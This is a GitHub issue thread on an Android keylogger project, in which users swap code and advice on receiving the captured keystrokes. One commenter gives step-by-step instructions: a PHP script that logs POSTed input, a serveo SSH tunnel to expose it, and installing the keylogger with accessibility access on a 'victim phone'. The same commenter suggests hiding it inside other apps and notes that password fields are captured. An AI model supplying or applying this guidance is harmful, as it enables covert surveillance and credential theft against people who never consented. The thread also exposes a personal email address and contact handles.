Open 12udy opened 6 years ago
Lo que hice yo, fue cambiar la parte donde se hace el envio post al servidor, te copio el codigo aqui:
BasicNameValuePair textBasicNameValuePAir= new BasicNameValuePair("Text", params[0]);
List
UrlEncodedFormEntity urlEncodedFormEntity = new UrlEncodedFormEntity(nameValuePairList); httpPost.setEntity(urlEncodedFormEntity);
y del lado de php o cualquier lenguaje te va llegar un POST en la variable "Text"
Saludos Nahuel
@zonavip How did you manage to write the server sided code on PHP. Can you elaborate ?
whats?
Obtener Outlook para Androidhttps://aka.ms/ghei36
From: Harshul notifications@github.com Sent: Thursday, August 9, 2018 1:19:05 AM To: bshu2/Android-Keylogger Cc: zonavip; Mention Subject: Re: [bshu2/Android-Keylogger] Timestamp (#1)
@zonaviphttps://github.com/zonavip How did you manage to write the server sided code on PHP. Can you elaborate ?
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHubhttps://github.com/bshu2/Android-Keylogger/issues/1#issuecomment-411631693, or mute the threadhttps://github.com/notifications/unsubscribe-auth/ANbWOQNB0lcrSa53UAKReffqsrTJPGhRks5uO7g5gaJpZM4RAd2b.
@zonavip But why should I download Outlook ?
Okay, It took me a while but I have completed porting the server part from "Go" to "PHP". If you want to take a look contact me !
@zonavip Yes your code helped me a lot, but still there's a problem in getting the "password" field texts, maybe it's all to do with that "TEXT MASK". Passwords inputs are shown as 'null' or '0' value !
Hi can you post php code? I was trying to deploy go code on google appengine but it not work for me
@mario8883 Yes I can but I need a little donation for that !
Contact me
@zonavip Who me ?
If you want to use this keylogger , and you don't have a website , you can use serveo to make a listener. Change that
https://cs460-android-keylogger.appspot.com
link on Keylogger.java file with
https://anythingHere.serveo.net/keys.php
And compile it ,install it, enable accessibility option in settings for it
Then , here is that php file you requested
Well , it's not same as the developer made , but it'll throw every data to test.txt
file on the same directory
<?php
file_put_contents('test.txt',
file_get_contents('php://input'),FILE_APPEND);
?>
And name it keys.php , and put it in on any directory
Then , run your own website for receiving data
php -S localhost:4444 -t /location/of/folder/where/is/the/keys.php/FileIsLocated
ssh -R anythingHere:443:localhost:4444 serveo.net
(You'll need php and openssh / autossh packages , install them using apt-get install )
Then , your https://anythinHere.serveo.net/keys.php link can be accessed through the internet !
Now , connect the victim phone to the internet ,install that keylogger , enable its accessibility service in settings it'll start keylogging every stuff ! (Personally tested , and it's damn good !)
My contact info:-
(Telegram :- "Retrocausality" , ever heard of it?
or @TermuxSucks)
(Mail:- vanshsantoshi3345@gmail.com)
You can bind / embedded this keylogger on apps too , and it works great
@bshu2 Hi there, Good job; How did u set up the server page for that? Is it gcp?